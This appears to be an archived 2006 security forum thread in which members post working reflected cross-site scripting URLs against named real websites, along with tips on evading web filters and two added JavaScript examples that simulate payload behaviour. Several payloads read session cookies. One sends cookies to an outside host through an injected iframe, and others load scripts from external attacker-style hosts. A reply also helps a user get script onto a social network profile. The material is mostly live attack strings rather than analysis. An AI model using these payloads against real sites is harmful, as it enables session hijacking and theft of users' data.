Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 26 of 65
Re: So it begins
Posted by: maluc
Date: November 09, 2006 02:35AM

By the way, for web pages that execute an injection many times, like that Nexopia one (ten times), the easiest way I've found to execute the exploit only once is to wrap it with this:
<script>if(typeof q=='undefined'){exploithere}q=5</script>

From the Nexopia example: http://www.nexopia.com/header.php?bodyname='%3E%3Cscript%3Eif(typeof%20q=='undefined')%7Balert('JustOnce')%7Dq=5%3C/script%3E%3Cx

If the page already has a q variable, it won't work properly, so it's best to pick a variable name like q5n.

-maluc

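The run-once guard above, reproduced outside a browser as an added example (this is not code from the post). The vulnerable page is modelled as the same injected script being inlined N times, one copy per reflection of the parameter, all sharing one window-like object `w`; the counter `hits` stands in for the real payload, and the `preset` argument models the caveat about a page that already defines the flag variable. Names such as `guardOnce`, `simulateReflection` and `demo` are this example's own.

```javascript
// Added example: maluc's "execute once" guard under Node.js.
// A template that echoes one parameter in N places runs the injected
// <script> N times; the guard makes the exploit body execute once.

// Build the guarded script text. Same shape as
//   <script>if(typeof q=='undefined'){exploithere}q=5</script>
// but with the flag name chosen by the caller; `w` stands in for `window`.
function guardOnce(body, flag) {
  return `if (typeof w.${flag} === 'undefined') { ${body} } w.${flag} = 5;`;
}

// Simulate the vulnerable page: `copies` inline scripts, one per reflection,
// each run as its own <script> block but sharing the global object `w`.
// `preset` models globals the page itself defines before the injection runs.
function simulateReflection(scriptText, copies, preset = {}) {
  const w = Object.assign({ hits: 0 }, preset);
  for (let i = 0; i < copies; i++) {
    new Function('w', scriptText)(w);
  }
  return w.hits;
}

// Constructed stand-in for the real payload: count executions instead of alerting.
const BODY = 'w.hits = w.hits + 1;';

function demo() {
  return {
    // Ten reflections, no guard: the payload runs ten times.
    unguarded: simulateReflection(BODY, 10),
    // Same ten reflections wrapped in the guard with a rare flag name: runs once.
    guarded: simulateReflection(guardOnce(BODY, 'q5n'), 10),
    // The caveat from the post: the page already owns `q`, so the guard never
    // sees it as undefined and the payload never runs at all.
    collision: simulateReflection(guardOnce(BODY, 'q'), 10, { q: 'page-owned' }),
  };
}

console.log(demo()); // { unguarded: 10, guarded: 1, collision: 0 }
```

The collision case is the reason to pick an unusual flag name: a clash with a page global does not make the payload run many times, it makes it run zero times, which is easy to misread as the injection point being filtered.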
Re: So it begins
Posted by: jungsonn
Date: November 09, 2006 02:36AM

No XSS but really funny:

Not validating input:
http://www.hackersafe.com/site/en/merchants/moreinfo/?send=Y&interest=technology

And remember, it's hack0r safe!

Re: So it begins
Posted by: maluc
Date: November 09, 2006 03:31AM

Haxxed without even trying.. >.>
http://www.hackersafe.com/error/msg.jsp?msg=Haxxored

-maluc

Re: So it begins
Posted by: jungsonn
Date: November 09, 2006 03:40AM

Ghehehe, yeah, that's ridiculous while they're boasting everywhere that they're such an authority.

Re: So it begins
Posted by: thomaspollet
Date: November 09, 2006 04:01AM

That hackersafe is just the next lie in infosec, providing that nice, fuzzy, false sense of security. Makes good .biz, I suppose.

http://www.tritonhealth.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

google intext:"hacker safe" ;)



Edited 1 time(s). Last edit at 11/09/2006 04:02AM by thomaspollet.

Re: So it begins
Posted by: maluc
Date: November 09, 2006 04:03AM

A two-part XSS, as you need to get a session ID first.

Go here: https://cm.rsaconference.com/US07/portal/startNewRegistration.ww?hasRegCode=no&regCodeFormHidden=&zipFormHidden=
Then here: https://cm.rsaconference.com/US07/portal/processCreateAccount.ww?password=&value%28profileValue_11088%29=XSS%22%3E%3Cscript%3Ealert(%22All%20your%20private%20keys%20are%20belong%20to%20me%5Cn%5Cn%22%2Bdocument.cookie)%3C/script%3E

-maluc

Re: So it begins
Posted by: thomaspollet
Date: November 09, 2006 05:50AM

http://www.usenext.com/UseNextDE/ShopInt/misc/miscShowNewsgroups.cfm?SNUUID=CC8A8130-E00E-2063-874892F19C7A185D&1163072824024%22%3E%3Cscript%3Ealert(1)%3C/script%3E&

This one converts to uppercase. Is there an XSS.JS up somewhere? <SCRIPT SRC=HTTP://ATTACK.COM/XSS.JS> should work...

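An added check for the uppercasing case (this is example code, not from the post): which parts of a payload survive a sink that uppercases its input. HTML tag and attribute names are case-insensitive, and so are the URL scheme and host, but the URL path is case-sensitive on most servers and JavaScript identifiers always are. So inline `alert(1)` dies as `ALERT(1)`, and so does the `String.fromCharCode(...)` form used elsewhere in this thread, while `<SCRIPT SRC=HTTP://ATTACK.COM/XSS.JS>` still loads provided the file is actually served at the uppercase path. The host attack.com is the one named in the post; nothing here fetches it, and the helper names are this example's own.

```javascript
// Added example: what survives an uppercasing sink. Runs under Node.js offline.

// The vulnerable sink as described: everything it echoes is uppercased.
function uppercaseSink(input) {
  return input.toUpperCase();
}

// Run a (possibly uppercased) inline script body with a stub alert().
// JavaScript identifiers are case-sensitive, so ALERT(1) or
// STRING.FROMCHARCODE(...) throws a ReferenceError instead of running.
function inlineScriptRuns(scriptBody) {
  let called = false;
  try {
    new Function('alert', scriptBody)(() => { called = true; });
  } catch (e) {
    if (!(e instanceof ReferenceError)) throw e;
    return false;
  }
  return called;
}

// Pull the SRC out of a <script src=...> tag. Tag and attribute names are
// case-insensitive in HTML, so the match is case-insensitive too. The WHATWG
// URL parser then shows which URL parts are normalized (scheme, host) and
// which are not (path).
function srcAfterSink(tagText) {
  const m = /<script\s+src=["']?([^"'\s>]+)/i.exec(tagText);
  if (!m) return null;
  const u = new URL(m[1]);
  return { scheme: u.protocol.replace(':', ''), host: u.host, path: u.pathname };
}

function report() {
  const inline = 'alert(1)';
  const encoded = 'alert(String.fromCharCode(88,83,83))';
  const external = '"><script src=http://attack.com/xss.js></script>';
  return {
    inlineBefore: inlineScriptRuns(inline),                     // true
    inlineAfter: inlineScriptRuns(uppercaseSink(inline)),       // false
    encodedAfter: inlineScriptRuns(uppercaseSink(encoded)),     // false
    external: srcAfterSink(uppercaseSink(external)),
    // { scheme: 'http', host: 'attack.com', path: '/XSS.JS' }
  };
}

console.log(report());
```

The practical consequence is the one the post reaches: put the payload in an external file whose name is all uppercase (or serve it from a host that ignores path case), because the only parts of the payload that must keep their case are the ones the browser resolves case-sensitively, and with an external script those are confined to the path.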
Re: So it begins
Posted by: maluc
Date: November 09, 2006 06:27AM

http://www.truste.org/ivalidate.php?companyName=Microsoft%20Corporation&sealid=105asdf'%3E%3Cscript%20src='http://ha.ckers.org/s.js

They issue SSL certs or something..

-maluc

Re: So it begins
Posted by: jungsonn
Date: November 09, 2006 07:18AM

HACKER SAFE©

http://www.dvdempire.com/Exec/v5_search_item.asp?userid=99365065948345&string=%22%3E%3Cscript%3Ealert%28%27hacker+safe%21%27%29%3B%3C%2Fscript%3E%3C%22&site_media_id=&site_id=4&pp=&used=0

http://www.goldnutritionstore.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert('H4cK0r%20Safe!!%20really,%20we%20truely%20are%20hacker%20safe,%20see%20the%20green%20logo.')%3C/script%3E%3C%22

This begs for its own thread.

Re: So it begins
Posted by: Kyran
Date: November 09, 2006 10:12AM

Made one.

- Kyran

Re: So it begins
Posted by: Kyran
Date: November 09, 2006 10:23AM

http://www.computerworld.com/action/search.do?command=basicSearch&searchTerms=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&.x=0&.y=0

- Kyran

Re: So it begins
Posted by: maluc
Date: November 09, 2006 12:23PM

Since I disclosed it in another thread..
http://gallery.yahoo.com/error.php?e=--%3E%3Cscript%3Edocument.write('%3Ciframe%20src=http://scripts.sitesled.com/cookiemonster.html?'%2Bescape(document.cookie)%2B'%3Ehiya')%3C/script%3E%3Cx

-maluc

Re: So it begins
Posted by: rsnake
Date: November 09, 2006 01:08PM

https://secure.fourseasons.com/secure/contact_us/gift_card_order_form.html?transaction_reference=&last_cc_number=&keyword=gift_card_order_form&contact_forms_link=141&contact_form_type=Hotel+Site&submission_counter=6&USD_100_cards=0&USD_250_cards=&USD_500_cards=&USD_1000_cards=&USD_2500_cards=&USD_5000_cards=&ship_method=domestic_express&USD_card_total=%240.00+US&USD_shipping=%240.00+US&USD_total=%240.00+US&cc_type=&cc_number=&cc_expiry=&email_confirmation=email_confirmation&email_address=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&billing_name_prefix=&billing_first_name=&billing_last_name=&billing_address_line_1=&billing_address_line_2=&billing_city=&billing_zip_or_postal_code=&billing_state_or_province=&billing_country=&billing_telephone_number=&billing_fax_number=&billing_mobile_number=&failed_email_address=&ship_to=same&enclosure_message=&enclosure_to=&enclosure_from=&verisign_result=&pobox_rejection=&success_message_redirect_action=&user_clicked_submit=true&field_meta_data_chart=%11USD+100+cards%10USD_100_cards%102%11USD+250+cards%10USD_250_cards%102%11USD+500+cards%10USD_500_cards%102%11USD+1000+cards%10USD_1000_cards%102%11USD+2500+cards%10USD_2500_cards%102%11USD+5000+cards%10USD_5000_cards%102%11Via%10ship_method%105%11Card+value+subtotal%10USD_card_total%1015%11Shipping%10USD_shipping%1015%11Credit+Card+will+be+charged%10USD_total%1015%11Credit+Card+Type%10cc_type%101%11Credit+Card+Number%10cc_number%102%11Credit+Card+Expiry%10cc_expiry%102%11Email+Confirmation%10email_confirmation%1015%11E-mail+Address%10email_address%102%11Prefix%10billing_name_prefix%102%11First+Name%10billing_first_name%102%11Last+Name%10billing_last_name%102%11Address+Line+1%10billing_address_line_1%102%11Address+Line+2%10billing_address_line_2%102%11City%10billing_city%102%11Zip+%2F+Postal+Code%10billing_zip_or_postal_code%102%11State+%2F+Province%10billing_state_or_province%102%11Country%10billing_country%101%11Telephone+Number%10billing_telephone_number%102%11Fax+Number%10billing_fax_number%102%11Mobile+Number%10billing_mobile_number%102%11Failed+E-mail+Address%10failed_email_address%1015%11Ship+to%10ship_to%105%11Prefix%10shipping_name_prefix%102%11First+Name%10shipping_first_name%102%11Last+Name%10shipping_last_name%102%11Address+Line+1%10shipping_address_line_1%102%11Address+Line+2%10shipping_address_line_2%102%11City%10shipping_city%102%11Zip+%2F+Postal+Code%10shipping_zip_or_postal_code%102%11State+%2F+Province%10shipping_state_or_province%102%11Country%10shipping_country%101%11Message%10enclosure_message%103%11To%10enclosure_to%102%11From%10enclosure_from%102%11Verisign+Result%10verisign_result%1015%11P.O.+Box+Rejection%10pobox_rejection%1015

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 09, 2006 01:13PM

Merliin posted a link to these guys so I thought I'd post my own link to them: http://www.opencores.org/search.cgi/do_search?query=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: kefka
Date: November 09, 2006 07:03PM

How about XSS as a means of web filter evasion? :)
E.g. WebSense blocking a website.

Re: So it begins
Posted by: adio_skater69
Date: November 09, 2006 07:37PM

*I'm brand new to this forum-- I only registered to ask this question, lmao. And I did the little ('''') thing b/c I guess the word can be searched for somehow, lol. So ignore it.*

I've tried injecting every XSS attack method into my('spa','c')e, but none of it seems to work. Does anyone know any vulnerability that can be exploited so that I can put JavaScript on my page?

And you'd prolly have to email me the answer so it won't be discovered. (But tell me, so I check my email.)

*edit: forgot to post email: adio.skater69@yahoo.com*



Edited 1 time(s). Last edit at 11/09/2006 07:39PM by adio_skater69.

Re: So it begins
Posted by: maluc
Date: November 09, 2006 08:23PM

kefka: Are you asking a question, or is that a reply to something? o.O Proxy sites should get around WebSense just perfectly - like proxydrop.com or Google's translator service.

adio: It seems they fixed both the fragmentation XSS holes.. but the QuickTime one still works. It'll be a pain in the butt to debug an exploit for it, but doable.. and I'm not sure if it has access to the DOM or not.

-maluc

Re: So it begins
Posted by: rsnake
Date: November 09, 2006 08:42PM

http://realtravel.com/search-results.aspx?destid=0&run=true&from=home&q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&submit.x=0&submit.y=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: adio_skater69
Date: November 09, 2006 08:42PM

kefka: WebSense blocks proxies & translator services, and some free domain hosts that allow CGI scripting (i.e. proxying), and since words are filtered in the URL, it would probably send WebSense into a refreshing loop (but I'm sure they made it so that that doesn't happen). WebSense is vicious. My school has that. :(

maluc: Where would I stick the code in the QuickTime hole if they block out embeds? All I need is one exploit so that I can stick all of my JS code into it. You seem like an expert, lol.

Re: So it begins
Posted by: WhiteAcid
Date: November 09, 2006 08:47PM

A good proxy for going around websense type filters is your home PC. Just install a SOCKS5 server or an SSH tunnel.

adio_skater69: have a read of http://www.gnucitizen.org/blog/backdooring-quicktime-movies/

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: id
Date: November 09, 2006 09:14PM

I previously wrote an article about proxying just about anything here: http://ha.ckers.org/ssh_proxy.html

When at client sites I would rather they didn't see me constantly going to a site with such a high grandma porn rating.

-id

Re: So it begins
Posted by: rsnake
Date: November 09, 2006 09:43PM

http://shopping.discovery.com/stores/servlet/DirectEmailSignup?storeId=10000&langId=-1&catalogId=10000&email1=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&signupbutton.x=19&signupbutton.y=11

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 09, 2006 09:49PM

XSS is on (lotsopopups): http://www.tv.com/science-fiction/genre/10/az.html?era=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&g=10&tag=genre_tabs;all

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: November 09, 2006 09:54PM

I feel really bad for the people who run this domain:
http://www.test.com/servlet/com.test.servlet.account.Login?fromLogin=true&fromLogin=true&login=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&loginPassword=&logIntoPublicSite=true&groupLoginCode=

Quote from their website:


On a daily basis Test Central receives hundreds of reports concerning the misuse of its test.com domain name.

These misuses are outside of the control of Test Central and test.com. Such misuses include:

• Originators of bulk e-mail, and hackers who forge test.com as the sender of SPAM.

• Organizations who while building their web sites, use the test.com URL while testing the web site.

Many of the individuals who contact Test Central concerning the abuse of test.com are obviously concerned, but Test Central is in the business of providing online and enterprise assessment and survey technology, Test Central is not in the business or a party of misusing the capability of the internet including SPAMing the general public.

As a service to the public, we do attempt to track down those organizations and individuals responsible for such abuse. Any help one can provide Test Central and test.com would be greatly appreciated.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: November 09, 2006 09:57PM

kefka or whoever: There's a proxy XSS in adidas.com that I'm sure won't be blocked then.. http://www.adidas.com/scripts/cud/cud.asp?call=registeremail&Postprocessor=http://tinyurl.com/2tx&dateofbirth_dd=1&dateofbirth_mm=1&dateofbirth_yyyy=1 but sadly, it pulls each page with a POST, so it's a bit cumbersome. Instead, just register for a free webhost somewhere and add a page that includes this script:
<script>
if (location.search.slice(1)) document.write('<iframe height="100%" width="100%" src="'+location.search.slice(1)+'"></iframe>');
</script>
Use: http://yoursite.com/proxy.html?http://google.com

adio: Use the link WhiteAcid posted; it worked great for me on MySpace.. and you can add QuickTime movies to your profile. I'll put it back up on mine in a bit, to demonstrate.

-maluc

Re: So it begins
Posted by: rsnake
Date: November 09, 2006 10:09PM

maluc, I don't think that would work, because most of these types of programs look for any connections to the "bad" host in question. If they didn't, you could simply spoof the referrer in your browser and it would work, since that's no different from what that script would do from the network's perspective.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: November 09, 2006 10:37PM

Oh, ya, I dunno what I was smoking.. makes no sense ^^

You'll have to host a PHP/ASP/Perl script somewhere, i.e. set up a private proxy, to pull the page and show it. Or, if WebSense doesn't do reverse DNS lookups, the Google translator frames go by an IP rather than translate.google.com - might pass a reverse DNS regardless.

http://64.233.179.104/translate_c?hl=en&ie=UTF-8&oe=UTF-8&langpair=ar%7Cen&u=http://asdf.com/&prev=/language_tools

-maluc

Re: So it begins
Posted by: kefka
Date: November 09, 2006 10:38PM

I don't know about WebSense. But it blocked it when I banned facebook.com at home from my Proventia M10. Thanks for the help though.

id, your method worked just fine; that article rocks. Thanks. I'll let you know about WebSense; I'll see what I can do about being there to make sure they try correctly.

Re: So it begins
Posted by: maluc
Date: November 09, 2006 10:42PM

http://www.imvu.com/catalog/web_request_help.php?problem_type=asdf%3Cscript%3Ealert(document.cookie)%3C/script%3E

-maluc

Re: So it begins
Posted by: rsnake
Date: November 09, 2006 10:43PM

http://www.bevmo.com/productlist.asp?Ntt=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&Ntk=All&D=&Nty=1

- RSnake
Gotta love it. http://ha.ckers.org
